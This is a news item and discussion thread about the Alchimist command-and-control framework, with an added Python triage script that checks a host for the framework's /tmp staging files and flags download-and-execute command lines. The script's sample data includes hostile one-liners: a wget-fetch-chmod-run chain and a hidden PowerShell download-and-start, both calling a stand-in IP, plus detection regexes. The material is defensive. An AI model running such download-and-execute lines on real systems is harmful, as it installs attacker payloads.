An attack framework of probable Chinese origin, used by cybercriminals, has been discovered:
A standalone Command and Control (C2) server called "Alchimist" was recently discovered by Cisco Talos. The framework has been designed to run attacks via standalone GoLang-based executables that can be distributed easily. The framework found by Talos contains both the whole web user interface and the payloads.
[...] Alchimist, whose name has been given by its developer, uses GoLang-based assets, which are custom-made embedded packages, to store all the resources needed for its operations as a C2 server. During initialization, all its content is placed in hard-coded folders, namely /tmp/Res for the web interface, HTML files and more folders, and /tmp/Res/Payload for its payloads for Windows and Linux operating systems.
A self-signed certificate without any server name is also dropped in the /tmp folder (Figure A), together with its key for use in HTTPS communications. That certificate could be found on five different IP addresses on the Internet at the time of the research, all of them used for Alchimist.
[...] The most common features expected of a Remote Administration Tool (RAT) are implemented in the interface, yet one stands out according to the researchers: the ability to generate PowerShell and wget code snippets for Windows and Linux systems. These commands might be embedded in malicious documents, LNK files or any other kind of file used for initial compromise, and download/install the additional payload provided by the framework: the Insekt RAT.
[...] More such attack frameworks have been found lately. Manjusaka, a Chinese sibling of Sliver and Cobalt Strike, appeared in 2022, programmed in GoLang for its C2 part, while the payloads were written in the Rust programming language. Rust, like GoLang, enables a developer to compile code for several different platforms very easily. More multiplatform frameworks written in the Go and Rust programming languages are expected.
The discovery of Alchimist stands as another indication that "threat actors are rapidly adopting off-the-shelf C2 frameworks to carry out their operations," according to Cisco Talos.
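The summary above names two things a defender can look for on a Linux host: the hard-coded staging layout (/tmp/Res, /tmp/Res/Payload, and a self-signed certificate and key dropped in /tmp) and the wget/PowerShell download-and-run snippets the framework generates. The following host-triage script is an added example, not code from the TechRepublic article, from Talos, or from the framework itself. It assumes the paths quoted in the summary, uses the `openssl` CLI (if installed) only to read a certificate's subject, and runs its command-line checks over constructed sample lines rather than real telemetry; the staging base is a parameter so the same logic can be exercised against a test tree.

```python
"""Host triage for the Alchimist staging artifacts described in the summary.

Added example, not from the article or from Talos. Checks a base directory
(/tmp on a live host) for the hard-coded layout Res/ and Res/Payload/ plus a
PEM certificate and private key dropped directly in the base, and flags
download-and-execute one-liners of the kind the framework generates.
"""
import re
import shutil
import subprocess
import tempfile
from pathlib import Path

STAGING_DIRS = ("Res", "Res/Payload")  # relative to the base, as quoted in the summary
PEM_CERT = b"-----BEGIN CERTIFICATE-----"
PEM_KEY = re.compile(rb"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----")

# wget/curl fetching a URL, followed on the same line by something that executes the result.
SHELL_DOWNLOADER = re.compile(r"\b(?:wget|curl)\b[^|;&]*https?://\S+")
EXEC_AFTER = re.compile(r"chmod\s+\+x|\|\s*(?:ba)?sh\b|&&\s*\.?/\S+")
# PowerShell invoking a web download or an encoded command ("-enc" also catches -EncodedCommand).
PS_CRADLE = re.compile(
    r"powershell(?:\.exe)?\b.*?(?:DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|-enc)",
    re.IGNORECASE)


def cert_subject(path: Path):
    """Subject line from the openssl CLI (assumed available); None if absent or unparseable."""
    if shutil.which("openssl") is None:
        return None
    proc = subprocess.run(["openssl", "x509", "-in", str(path), "-noout", "-subject"],
                          capture_output=True, text=True, check=False)
    if proc.returncode != 0:
        return None
    return proc.stdout.strip()  # assumption: an empty subject prints as "subject="


def scan_staging(base="/tmp"):
    """Return human-readable findings for the staging layout under `base`."""
    base = Path(base)
    findings = []
    for rel in STAGING_DIRS:
        if (base / rel).is_dir():
            findings.append(f"staging directory present: {base / rel}")
    if not base.is_dir():
        return findings
    for p in sorted(base.iterdir()):
        if not p.is_file():
            continue
        try:
            head = p.read_bytes()[:4096]
        except OSError:
            continue
        if PEM_CERT in head:
            note = " (empty subject)" if cert_subject(p) == "subject=" else ""
            findings.append(f"PEM certificate in staging base: {p}{note}")
        elif PEM_KEY.search(head):
            findings.append(f"PEM private key in staging base: {p}")
    return findings


def flag_cmdline(cmd: str):
    """Label a process command line as a downloader pattern, or None if it looks benign."""
    if SHELL_DOWNLOADER.search(cmd) and EXEC_AFTER.search(cmd):
        return "shell download-and-execute"
    if PS_CRADLE.search(cmd):
        return "powershell download cradle"
    return None


def triage_cmdlines(cmds):
    """Return (command line, label) pairs for every flagged line, preserving order."""
    return [(c, flag_cmdline(c)) for c in cmds if flag_cmdline(c)]


# Constructed sample command lines (not real telemetry); 198.51.100.0/24 is a documentation range.
SAMPLE_CMDLINES = [
    "wget -q http://198.51.100.7/Res/Payload/agent -O /tmp/.x && chmod +x /tmp/.x && /tmp/.x",
    r'powershell -w hidden -c "Invoke-WebRequest http://198.51.100.7/Res/Payload/agent.exe '
    r'-OutFile $env:TEMP\a.exe; Start-Process $env:TEMP\a.exe"',
    "wget -O /tmp/linux.tar.xz https://cdn.kernel.org/pub/linux/kernel/v6.x/linux.tar.xz",
    "curl -sS https://example.invalid/api | jq .",
    "ls -la /tmp",
]


def demo():
    """Build a constructed tree mimicking the staging layout and triage it (self-test)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "Res" / "Payload").mkdir(parents=True)
        (root / "cert.pem").write_bytes(PEM_CERT + b"\nconstructed, not a real cert\n-----END CERTIFICATE-----\n")
        (root / "key.pem").write_bytes(b"-----BEGIN PRIVATE KEY-----\nconstructed\n-----END PRIVATE KEY-----\n")
        return scan_staging(root), triage_cmdlines(SAMPLE_CMDLINES)


if __name__ == "__main__":
    for line in scan_staging("/tmp"):
        print(line)
    for cmd, label in triage_cmdlines(SAMPLE_CMDLINES):
        print(f"[{label}] {cmd}")
```

Run as-is it inspects the real /tmp and prints the constructed command-line hits; `demo()` runs the same checks against a throwaway tree. The command-line rules are deliberately conservative: a plain `wget` to /tmp or a `curl | jq` pipeline is not flagged, only a fetch paired with `chmod +x`, a pipe into a shell, or an `&&` that runs the downloaded file, so the rules can sit in an EDR or auditd pipeline without drowning analysts in package-manager noise.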
(Score: 4, Touché) by coolgopher on Tuesday October 18 2022, @01:11AM
The solution is obvious. Simply treat any Go runtime as malware and have the AV tools nuke them. :D
(Score: 0) by Anonymous Coward on Tuesday October 18 2022, @02:34AM
> New Alchimist attack framework
Not to be confused with a member of the New Alchemy Institute, https://en.wikipedia.org/wiki/New_Alchemy_Institute [wikipedia.org]
(Score: 5, Insightful) by canopic jug on Tuesday October 18 2022, @11:06AM
Interesting. The article was more infomercial than article. It was written by a Trend Micro employee, so of course it has no information about how the "Alchimist" trojan [talosintelligence.com] actually gets installed on Linux. He also avoids recommending preventative measures and instead concentrates his recommendations on corrective action which, some coincidence, is the business model of the company he works for. Without information about where or how to download it or even a link to the source repository, there's not much to go on. All in all it looks like another FUD article designed to cast aspersions against Linux and put air under the wings of the "see-Linux-is-just-as-vulnerable-so-you-might-as-well-use-Windows" mantra bleated breathlessly by the security poseurs.
Furthermore, this is yet another reason why a mixture of non-x86 architectures is needed for critical services. If you have a mixture of types of hardware, even if the compiled binaries blow through one set of hardware, the other(s) might have enough of a delay before getting hit that you have a little time to shore up defenses. However, SPARC is gone and ARM has not yet fully arrived, so with nearly all servers being x86 these days, data centers are like digital tinderboxes and, where there is a Windows presence, digital Chernobyls.
Money is not free speech. Elections should not be auctions.